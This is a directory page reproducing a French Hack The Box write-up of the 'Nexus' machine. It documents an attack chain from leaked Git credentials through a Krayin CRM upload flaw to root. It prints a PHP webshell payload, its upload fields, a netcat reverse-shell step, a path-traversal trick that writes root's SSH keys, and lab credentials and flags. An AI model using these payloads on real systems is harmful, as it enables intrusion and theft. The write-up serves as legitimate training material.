Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
htb-labs-nexus — # Write-up de la machine Nexus de Hack The Box couvrant la reconnaissance, la découverte d'identifiants Gitea, l'exploitation de Krayin CRM via CVE-2026-38526, l'accès initial et l'élévation de privilèges via un service de synchronisation de modèles Gitea vulnérable. | Kitploit
Outils/GitHubGitHub/diegorivas1/htb-labs-nexus
Escalade de PrivilègesReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebCTFTests d'IntrusionApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Labs et Pratique
GitHubdiegorivas1/htb-labs-nexus

htb-labs-nexus

# Write-up de la machine Nexus de Hack The Box couvrant la reconnaissance, la découverte d'identifiants Gitea, l'exploitation de Krayin CRM via CVE-2026-38526, l'accès initial et l'élévation de privilèges via un service de synchronisation de modèles Gitea vulnérable.

Voir le dépôt
il y a 8h 2mPas encore vérifié

🏴‍☠️ HTB Labs - Nexus

English 🇺🇸 | Español 🇪🇸

English | Español

HTB Difficulty OS Platform


📋 Vue d'ensemble

Nexus est une machine Linux de difficulté Facile de Hack The Box qui illustre une chaîne d'attaque en plusieurs étapes impliquant l'énumération d'hôtes virtuels, des identifiants exposés, une fonctionnalité d'application web vulnérable, l'exécution de code à distance, la réutilisation d'identifiants et l'élévation de privilèges locale.

Chaîne d'attaque

root@kitploit:~
Reconnaissance
      │
      ▼
Énumération d'hôtes virtuels
      │
      ├── git.nexus.htb
      └── billing.nexus.htb
              │
              ▼
      Historique des commits Gitea
              │
              ▼
       Identifiants exposés
              │
              ▼
        Connexion Krayin CRM
              │
              ▼
      CVE-2026-38526
              │
              ▼
        Webshell PHP
              │
              ▼
       Reverse Shell
        (www-data)
              │
              ▼
       Fichier .env de l'application
              │
              ▼
        SSH en tant que jones
              │
              ▼
   gitea-template-sync
              │
              ▼
       Traversée de chemin
              │
              ▼
    Dépôt Git malveillant
              │
              ▼
         SSH en tant que root

Techniques clés

  • 🔍 Énumération d'hôtes virtuels
  • 🔑 Découverte d'identifiants via l'historique des commits Git
  • 💻 Exploitation de Krayin CRM
  • 🐚 Webshell PHP et reverse shell
  • 🔐 Réutilisation d'identifiants
  • 🔬 Énumération des services Linux
  • 📂 Traversée de chemin
  • 🌳 Construction d'un dépôt Git malveillant
  • 👑 Élévation de privilèges vers root

IP cible : 10.129.82.92


🔍 Phase 1 Reconnaissance

Scan des ports

root@kitploit:~
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92

Résultats

root@kitploit:~
22/tcp  open  ssh   OpenSSH 9.6p1 Ubuntu
80/tcp  open  http  nginx 1.24.0 (Ubuntu)

Énumération des hôtes virtuels

root@kitploit:~
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain

Hôtes découverts

root@kitploit:~
git.nexus.htb       → Gitea
billing.nexus.htb   → Krayin CRM

Ajoutez les hôtes découverts à /etc/hosts :

root@kitploit:~
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts

🔑 Phase 2 Découverte d'identifiants

Énumération Gitea

Naviguez vers :

root@kitploit:~
http://git.nexus.htb

Un dépôt nommé :

root@kitploit:~
admin/krayin-docker-setup

contient des informations utiles dans son historique Git.

Le fichier .env peut être récupéré à partir des commits précédents, révélant des identifiants qui ne sont plus présents dans la version actuelle.

Identifiants découverts

ServiceNom d'utilisateurMot de passe
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04

L'adresse e-mail [email protected] a également été identifiée dans la section emploi du site web principal.


💻 Phase 3 CVE-2026-38526 : Krayin CRM

Connexion au CRM

root@kitploit:~
URL : http://billing.nexus.htb/admin/login

Email : [email protected]
Mot de passe : N27xh!!2ucY04

Téléversement du webshell

Naviguez vers :

root@kitploit:~
/admin/mail/sent

Ensuite :

  1. Cliquez sur Compose Mail.
  2. Joignez la charge utile PHP.
  3. Interceptez la requête à l'aide de Burp Suite.
  4. Modifiez le nom du fichier téléversé.
  5. Changez le type MIME.
  6. Transmettez la requête.

La charge utile est stockée dans :

root@kitploit:~
exploits/CVE-2026-38526/shell.php

Charge utile :

root@kitploit:~
<?php system($_GET["cmd"]); ?>

Les champs multipart pertinents sont :

root@kitploit:~
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php

Webshell

Après un téléversement réussi :

root@kitploit:~
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id

Résultat attendu :

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

📡 Phase 4 Reverse Shell

Démarrez un écouteur :

root@kitploit:~
nc -lvnp 4444

Déclenchez ensuite le reverse shell via le webshell téléversé.

L'implémentation Python est disponible dans :

root@kitploit:~
exploits/CVE-2026-38526/reverse_shell.py

À ce stade, le shell est obtenu en tant que :

root@kitploit:~
www-data

🐚 Phase 5 Accès utilisateur

Lire la configuration de l'application

Inspectez la configuration de Krayin :

root@kitploit:~
cat /var/www/krayin/.env

Des identifiants sont trouvés :

root@kitploit:~
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR

Énumérer les utilisateurs

root@kitploit:~
cat /etc/passwd | grep sh$

Le compte jones est identifié.

SSH en tant que jones

root@kitploit:~
ssh [email protected]

Mot de passe :

root@kitploit:~
y27xb3ha!!74GbR

Drapeau utilisateur

root@kitploit:~
f20cbf9aeb6bb228d356a42ff49c1933

🔬 Phase 6 Élévation de privilèges

Énumérer les services

root@kitploit:~
systemctl list-units | grep -i gitea

Le service et la minuterie suivants sont identifiés :

root@kitploit:~
gitea-template-sync.timer
gitea-template-sync.service

Le service s'exécute avec des privilèges élevés.

Script vulnérable

root@kitploit:~
/etc/gitea/template-sync.py

Le mécanisme de synchronisation utilise une construction de chemin qui peut être abusée via une traversée de chemin.


🎯 Phase 7 Dépôt Git malveillant

Générez une paire de clés SSH :

root@kitploit:~
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub

L'exploit de manipulation d'objets Git se trouve dans :

root@kitploit:~
exploits/gitea_template_sync/exploit_git.py

Créez le dépôt :

root@kitploit:~
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit

git init
python3 exploit_git.py

Le dépôt doit utiliser la branche :

root@kitploit:~
main

Jeton Gitea

Générez un jeton d'accès personnel via :

root@kitploit:~
http://git.nexus.htb

Naviguez vers :

root@kitploit:~
Settings → Applications

Configurez ensuite le dépôt distant :

root@kitploit:~
git remote set-url origin http://jones:[email protected]/jones/exploit.git

Poussez le dépôt malveillant :

root@kitploit:~
git push -f origin main

⏰ Phase 8 Synchronisation des modèles

Surveillez le journal de synchronisation :

root@kitploit:~
tail -f /var/log/template-sync.log

Une synchronisation réussie entraîne le traitement de l'arborescence Git malveillante par le service privilégié.

Exemple :

root@kitploit:~
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30]   synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete

👑 Phase 9 Root

Une fois la clé publique SSH écrite dans le compte root :

root@kitploit:~
ssh -i /tmp/nexus_root [email protected]

Vérifiez l'accès :

root@kitploit:~
whoami

Résultat attendu :

root@kitploit:~
root

Récupérez le drapeau root :

root@kitploit:~
cat /root/root.txt

Drapeau root

root@kitploit:~
85be1d2a3084e387da0e7dd118908c63

🏆 Drapeaux

DrapeauValeur
Userf20cbf9aeb6bb228d356a42ff49c1933
Root85be1d2a3084e387da0e7dd118908c63

🔐 Identifiants

Ces identifiants appartiennent à l'environnement de laboratoire Hack The Box documenté par ce dépôt.


🛠️ Outils


📁 Structure du dépôt

root@kitploit:~
htb-labs-nexus/
├── README.md
├── exploits/
│   ├── CVE-2026-38526/
│   │   ├── shell.php
│   │   ├── reverse_shell.py
│   │   └── burp_request.txt
│   └── gitea_template_sync/
│       ├── exploit_git.py
│       ├── create_repo.sh
│       └── key.pub
├── scripts/
│   ├── linpeas.sh
│   ├── LinEnum.sh
│   └── enum_services.sh
├── assets/
│   ├── nmap_scan.txt
│   ├── gobuster_vhost.txt
│   └── credentials.txt
├── screenshots/
│   ├── gitea_repo.png
│   ├── crm_login.png
│   ├── webshell.png
│   └── root_flag.png
└── notes/
    ├── methodology.md
    ├── commands.md
    └── credentials.md

📚 Ressources supplémentaires

  • CVE-2026-38526
  • Krayin CRM
  • Documentation Gitea
  • OWASP Path Traversal

⚠️ Avertissement

Ce dépôt est destiné à des fins éducatives et à des tests de sécurité autorisés uniquement.

Les techniques, identifiants, exploits et commandes documentés ici ne doivent pas être utilisés contre des systèmes sans autorisation explicite.


🎯 Points clés à retenir

  1. 🔍 Énumérez les hôtes virtuels : des services importants peuvent être cachés derrière des sous-domaines.
  2. 🔑 Examinez l'historique Git : supprimer un secret d'un fichier ne signifie pas qu'il a disparu de l'historique du dépôt.
  3. 💻 Analysez les téléversements de fichiers : la validation des extensions et des types MIME peut être un contrôle de sécurité critique.
  4. 🐚 Énumérez après avoir obtenu un shell : les fichiers de configuration peuvent contenir des identifiants réutilisables.
  5. 🔬 Examinez les services privilégiés : un service s'exécutant en tant que root peut devenir un vecteur d'élévation de privilèges.
  6. 📂 Validez correctement les chemins de fichiers : une gestion non sécurisée des chemins contrôlés par l'utilisateur peut introduire des vulnérabilités de traversée de chemin.
  7. 🌳 Git peut devenir un vecteur d'attaque : les objets et arborescences Git peuvent être manipulés lorsqu'une application fait confiance à tort à leur structure.

🙏 Crédits

  • Hack The Box : Machine et plateforme de laboratoire
  • P3lured : Write-up original
  • Tran Manh Tan : Guide complémentaire

⭐ Si ce write-up vous a été utile, pensez à mettre une étoile au dépôt.

Télécharger l’outil
ServiceNom d'utilisateurMot de passe / Clé
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04
Jeton Giteajones1dd7105bf7e57cad02c5a56af5d92703a7839364
SSHjonesy27xb3ha!!74GbR
SSH Rootroot/tmp/nexus_root
OutilObjectif
NmapÉnumération des ports et services
GobusterÉnumération des hôtes virtuels
Burp SuiteInterception et modification des requêtes HTTP
GitAnalyse de dépôts et construction de dépôts malveillants
Python 3Scripts d'exploitation
NetcatÉcouteur de reverse shell
LinEnumÉnumération Linux
LinPEASÉnumération pour l'élévation de privilèges
SSHAccès distant